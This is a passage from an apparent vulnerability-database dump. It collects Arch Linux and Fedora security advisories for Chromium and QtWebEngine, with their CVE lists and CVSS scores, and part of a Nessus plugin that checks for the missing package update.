spoofing)\n\nAn address spoofing flaw was found in the Omnibox component of the\nChromium browser.\n\n- CVE-2016-5223 (arbitrary code execution)\n\nAn integer overflow flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5224 (same-origin policy bypass)\n\nA same-origin bypass flaw was found in the SVG component of the\nChromium browser.\n\n- CVE-2016-5225 (access restriction bypass)\n\nA CSP bypass flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5226 (cross-site scripting)\n\nA limited XSS flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-9650 (information disclosure)\n\nA CSP referrer disclosure vulnerability has been discovered in the\nChromium browser.\n\n- CVE-2016-9651 (access restriction bypass)\n\nA private property access flaw was found in the V8 component of the\nChromium browser.\n\n- CVE-2016-9652 (arbitrary code execution)\n\nVarious fixes from internal audits, fuzzing and other initiatives.\n\nImpact\n======\n\nA remote attacker can bypass various restrictions, access sensitive\ninformation, spoof certain content or execute arbitrary code on the\naffected host.\n\nReferences\n==========\n\nhttps://googlechromereleases.blogspot.fr/2016/12/stable-channel-update-for-desktop.html\nhttps://access.redhat.com/security/cve/CVE-2016-5203\nhttps://access.redhat.com/security/cve/CVE-2016-5204\nhttps://access.redhat.com/security/cve/CVE-2016-5205\nhttps://access.redhat.com/security/cve/CVE-2016-5206\nhttps://access.redhat.com/security/cve/CVE-2016-5207\nhttps://access.redhat.com/security/cve/CVE-2016-5208\nhttps://access.redhat.com/security/cve/CVE-2016-5209\nhttps://access.redhat.com/security/cve/CVE-2016-5210\nhttps://access.redhat.com/security/cve/CVE-2016-5211\nhttps://access.redhat.com/security/cve/CVE-2016-5212\nhttps://access.redhat.com/security/cve/CVE-2016-5213\nhttps://access.redhat.com/security/cve/CVE-2016-5214\nhttps://access.redhat.com/security/cve/CVE-2016-5215\nhttps://access.redhat.com/security/cve/CVE-2016-5216\nhttps://access.redhat.com/security/cve/CVE-2016-5217\nhttps://access.redhat.com/security/cve/CVE-2016-5218\nhttps://access.redhat.com/security/cve/CVE-2016-5219\nhttps://access.redhat.com/security/cve/CVE-2016-5220\nhttps://access.redhat.com/security/cve/CVE-2016-5221\nhttps://access.redhat.com/security/cve/CVE-2016-5222\nhttps://access.redhat.com/security/cve/CVE-2016-5223\nhttps://access.redhat.com/security/cve/CVE-2016-5224\nhttps://access.redhat.com/security/cve/CVE-2016-5225\nhttps://access.redhat.com/security/cve/CVE-2016-5226\nhttps://access.redhat.com/security/cve/CVE-2016-9650\nhttps://access.redhat.com/security/cve/CVE-2016-9651\nhttps://access.redhat.com/security/cve/CVE-2016-9652", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-12-03T00:00:00", "type": "archlinux", "title": "[ASA-201612-3] chromium: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2016-12-03T00:00:00", "id": "ASA-201612-3", "href": "https://security.archlinux.org/ASA-201612-3", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:34:11", "description": "Arch Linux Security Advisory ASA-201610-15\n==========================================\n\nSeverity: Critical\nDate : 2016-10-23\nCVE-ID : CVE-2016-5181 CVE-2016-5182 CVE-2016-5183 CVE-2016-5184\nCVE-2016-5185 CVE-2016-5186 CVE-2016-5187 CVE-2016-5188\nCVE-2016-5189 CVE-2016-5190 CVE-2016-5191 CVE-2016-5192\nCVE-2016-5193 CVE-2016-5194\nPackage : chromium\nType : multiple issues\nRemote : Yes\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package chromium before version 54.0.2840.59-1 is vulnerable to\nmultiple issues including arbitrary code execution, content spoofing,\ncross-site scripting, information disclosure, same-origin policy bypass\nand insufficient validation.\n\nResolution\n==========\n\nUpgrade to 54.0.2840.59-1.\n\n# pacman -Syu \"chromium>=54.0.2840.59-1\"\n\nThe problems have been fixed upstream in version 54.0.2840.59.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2016-5181 (cross-site scripting)\n\nAn universal XSS flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5182 (arbitrary code execution)\n\nA heap overflow flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5183 (arbitrary code execution)\n\nAn use after free flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5184 (arbitrary code execution)\n\nAn use after free flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5185 (arbitrary code execution)\n\nAn use after free flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5186 (information disclosure)\n\nAn out of bounds read flaw was found in the DevTools component of the\nChromium browser.\n\n- CVE-2016-5187 (content spoofing)\n\nAn URL spoofing flaw was found in the Chromium browser.\n\n- CVE-2016-5188 (content spoofing)\n\nAn UI spoofing flaw was found in the Chromium browser.\n\n- CVE-2016-5189 (content spoofing)\n\nAn URL spoofing flaw was found in the Chromium browser.\n\n- CVE-2016-5190 (arbitrary code execution)\n\nAn use after free flaw was found in the Internals component of the\nChromium browser.\n\n- CVE-2016-5191 (cross-site scripting)\n\nAn universal XSS flaw was found in the Bookmarks component of the\nChromium browser.\n\n- CVE-2016-5192 (same-origin policy bypass)\n\nA cross-origin bypass flaw was found in the Blink component of the\nChromium browser.\n\n- CVE-2016-5193 (insufficient validation)\n\nA scheme bypass vulnerability has been discovered.\n\n- CVE-2016-5194 (arbitrary code execution)\n\nVarious fixes from internal audits, fuzzing and other initiatives.\n\nImpact\n======\n\nA remote attacker can bypass security measures, access sensitive\ninformation or execute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://googlechromereleases.blogspot.fr/2016/10/stable-channel-update-for-desktop.html\nhttps://access.redhat.com/security/cve/CVE-2016-5181\nhttps://access.redhat.com/security/cve/CVE-2016-5182\nhttps://access.redhat.com/security/cve/CVE-2016-5183\nhttps://access.redhat.com/security/cve/CVE-2016-5184\nhttps://access.redhat.com/security/cve/CVE-2016-5185\nhttps://access.redhat.com/security/cve/CVE-2016-5186\nhttps://access.redhat.com/security/cve/CVE-2016-5187\nhttps://access.redhat.com/security/cve/CVE-2016-5188\nhttps://access.redhat.com/security/cve/CVE-2016-5189\nhttps://access.redhat.com/security/cve/CVE-2016-5190\nhttps://access.redhat.com/security/cve/CVE-2016-5191\nhttps://access.redhat.com/security/cve/CVE-2016-5192\nhttps://access.redhat.com/security/cve/CVE-2016-5193\nhttps://access.redhat.com/security/cve/CVE-2016-5194", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-10-23T00:00:00", "type": "archlinux", "title": "[ASA-201610-15] chromium: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5181", "CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5184", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5189", "CVE-2016-5190", "CVE-2016-5191", "CVE-2016-5192", "CVE-2016-5193", "CVE-2016-5194"], "modified": "2016-10-23T00:00:00", "id": "ASA-201610-15", "href": "https://security.archlinux.org/ASA-201610-15", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "description": "Qt5 - QtWebEngine components. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-16T14:40:06", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: qt5-qtwebengine-5.8.0-8.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5189", "CVE-2016-5199", "CVE-2016-5201", "CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-9650", "CVE-2016-9651"], "modified": "2017-04-16T14:40:06", "id": "FEDORA:3A44A6076F4B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/NC6RAT5BS2LMSN5UE3DUX3SVIR6USC4H/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-12-16T03:56:11", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: chromium-55.0.2883.87-1.fc24", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202", "CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2016-12-16T03:56:11", "id": "FEDORA:6B6F7607924F", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZZECS3A7ULG4B4YXBKUZMA3NTQBE5HGU/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-12-16T00:32:16", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: chromium-55.0.2883.87-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202", "CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2016-12-16T00:32:16", "id": "FEDORA:6291A602F03A", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/7LGZO2VOGJOZUUXNQITD6YMIUQ2L5GTU/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Qt5 - QtWebEngine components. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-07-23T21:52:43", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: qt5-qtwebengine-5.6.3-0.1.20170712gitee719ad313e564.fc24", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5078", "CVE-2016-5133", "CVE-2016-5147", "CVE-2016-5153", "CVE-2016-5161", "CVE-2016-5166", "CVE-2016-5170", "CVE-2016-5171", "CVE-2016-5172", "CVE-2016-5181", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5192", "CVE-2016-5198", "CVE-2016-5205", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652", "CVE-2017-5006", "CVE-2017-5007", "CVE-2017-5008", "CVE-2017-5009", "CVE-2017-5010", "CVE-2017-5012", "CVE-2017-5015", "CVE-2017-5016", "CVE-2017-5017", "CVE-2017-5019", "CVE-2017-5023", "CVE-2017-5024", "CVE-2017-5025", "CVE-2017-5026", "CVE-2017-5027", "CVE-2017-5029", "CVE-2017-5033", "CVE-2017-5037", "CVE-2017-5044", "CVE-2017-5046", "CVE-2017-5047", "CVE-2017-5048", "CVE-2017-5049", "CVE-2017-5050", "CVE-2017-5051", "CVE-2017-5059", "CVE-2017-5061", "CVE-2017-5062", "CVE-2017-5065", "CVE-2017-5067", "CVE-2017-5069", "CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5083", "CVE-2017-5089"], "modified": "2017-07-23T21:52:43", "id": "FEDORA:E68A1603A526", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-03-27T15:42:31", "description": "This update updates QtWebEngine to the 5.8.0 release. QtWebEngine 5.8.0 is part of the Qt 5.8.0 release, but only the QtWebEngine component is included in this update.\n\nThe update fixes the following security issues in QtWebEngine 5.7.1:\nCVE-2016-5182, CVE-2016-5183, CVE-2016-5189, CVE-2016-5199, CVE-2016-5201, CVE-2016-5203, CVE-2016-5204, CVE-2016-5205, CVE-2016-5206, CVE-2016-5208, CVE-2016-5207, CVE-2016-5210, CVE-2016-5211, CVE-2016-5212, CVE-2016-5213, CVE-2016-5214, CVE-2016-5215. CVE-2016-5216, CVE-2016-5217, CVE-2016-5218, CVE-2016-5219, CVE-2016-5221, CVE-2016-5222, CVE-2016-5223, CVE-2016-5224, CVE-2016-5225, CVE-2016-9650 and CVE-2016-9651.\n\nOther immediately usable changes in QtWebEngine 5.8 include :\n\n - Based on Chromium 53.0.2785.148 with security fixes from Chromium up to version 55.0.2883.75. (5.7.1 was based on Chromium 49.0.2623.111 with security fixes from Chromium up to version 54.0.2840.87.)\n\n - The `view-source:` scheme is now supported.\n\n - User scripts now support metadata (`@include`, `@exclude`, `@match`) as in Greasemonkey.\n\n - Some `chrome:` schemes now supported, for instance `chrome://gpu`.\n\n - Several bugs were fixed, see https://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/cha nges-5.8.0 for details.\n\nThe following changes in QtWebEngine 5.8 require compile-time application support and will only be available after applications are rebuilt (and patched to remove the checks for Qt 5.8, because Qt is still version 5.7.1, only QtWebEngine is being updated) :\n\n - Spellchecking with a forked version of Hunspell. This Fedora package automatically converts system Hunspell dictionaries (installed by system RPMs into the systemwide location) to the Chromium `bdic` format used by QtWebEngine (using an RPM file trigger). If you wish to use dictionaries installed manually, use the included `qwebengine_convert_dict` tool. Alternatively, you can also download dictionaries directly in the Chromium `bdic` format.\n\n - Support for printing directly to a printer. (Note that QupZilla already supports printing to a printer, because it can use the printToPdf API that has existed since QtWebEngine 5.7 to print to a printer with the help of the `lpr` command-line tool. But other applications such as KMail require the new direct printing API.)\n\n - Added a setting to enable printing of CSS backgrounds.\n\nThe following new QML APIs are available to developers :\n\n - Tooltips (HTML5 global title attribute) are now also supported in the QML API.\n\n - Qt WebEngine (QML) allows defining custom dialogs / context menus.\n\n - Qt WebEngine (QML) on `eglfs` uses builtin dialogs based on Qt Quick Controls 2.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-04-17T00:00:00", "type": "nessus", "title": "Fedora 25 : qt5-qtwebengine (2017-ae1fde5fb8)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5189", "CVE-2016-5199", "CVE-2016-5201", "CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-9650", "CVE-2016-9651"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-AE1FDE5FB8.NASL", "href": "https://www.tenable.com/plugins/nessus/99415", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-ae1fde5fb8.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99415);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-5182\", \"CVE-2016-5183\", \"CVE-2016-5189\", \"CVE-2016-5199\", \"CVE-2016-5201\", \"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5210\", \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\", \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-9650\", \"CVE-2016-9651\");\n script_xref(name:\"FEDORA\", value:\"2017-ae1fde5fb8\");\n\n script_name(english:\"Fedora 25 : qt5-qtwebengine (2017-ae1fde5fb8)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update updates QtWebEngine to the 5.8.0 release. QtWebEngine\n5.8.0 is part of the Qt 5.8.0 release, but only the QtWebEngine\ncomponent is included in this update.\n\nThe update fixes the following security issues in QtWebEngine 5.7.1:\nCVE-2016-5182, CVE-2016-5183, CVE-2016-5189, CVE-2016-5199,\nCVE-2016-5201, CVE-2016-5203, CVE-2016-5204, CVE-2016-5205,\nCVE-2016-5206, CVE-2016-5208, CVE-2016-5207, CVE-2016-5210,\nCVE-2016-5211, CVE-2016-5212, CVE-2016-5213, CVE-2016-5214,\nCVE-2016-5215. CVE-2016-5216, CVE-2016-5217, CVE-2016-5218,\nCVE-2016-5219, CVE-2016-5221, CVE-2016-5222, CVE-2016-5223,\nCVE-2016-5224, CVE-2016-5225, CVE-2016-9650 and CVE-2016-9651.\n\nOther immediately usable changes in QtWebEngine 5.8 include :\n\n - Based on Chromium 53.0.2785.148 with security fixes from\n Chromium up to version 55.0.2883.75. (5.7.1 was based on\n Chromium 49.0.2623.111 with security fixes from Chromium\n up to version 54.0.2840.87.)\n\n - The `view-source:` scheme is now supported.\n\n - User scripts now support metadata (`@include`,\n `@exclude`, `@match`) as in Greasemonkey.\n\n - Some `chrome:` schemes now supported, for instance\n `chrome://gpu`.\n\n - Several bugs were fixed, see\n https://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/cha\n nges-5.8.0 for details.\n\nThe following changes in QtWebEngine 5.8 require compile-time\napplication support and will only be available after applications are\nrebuilt (and patched to remove the checks for Qt 5.8, because Qt is\nstill version 5.7.1, only QtWebEngine is being updated) :\n\n - Spellchecking with a forked version of Hunspell. This\n Fedora package automatically converts system Hunspell\n dictionaries (installed by system RPMs into the\n systemwide location) to the Chromium `bdic` format used\n by QtWebEngine (using an RPM file trigger). If you wish\n to use dictionaries installed manually, use the included\n `qwebengine_convert_dict` tool. Alternatively, you can\n also download dictionaries directly in the Chromium\n `bdic` format.\n\n - Support for printing directly to a printer. (Note that\n QupZilla already supports printing to a printer, because\n it can use the printToPdf API that has existed since\n QtWebEngine 5.7 to print to a printer with the help of\n the `lpr` command-line tool. But other applications such\n as KMail require the new direct printing API.)\n\n - Added a setting to enable printing of CSS backgrounds.\n\nThe following new QML APIs are available to developers :\n\n - Tooltips (HTML5 global title attribute) are now also\n supported in the QML API.\n\n - Qt WebEngine (QML) allows defining custom dialogs /\n context menus.\n\n - Qt WebEngine (QML) on `eglfs` uses builtin dialogs based\n on Qt Quick Controls 2.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-ae1fde5fb8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/changes-5.8.0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected qt5-qtwebengine package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) 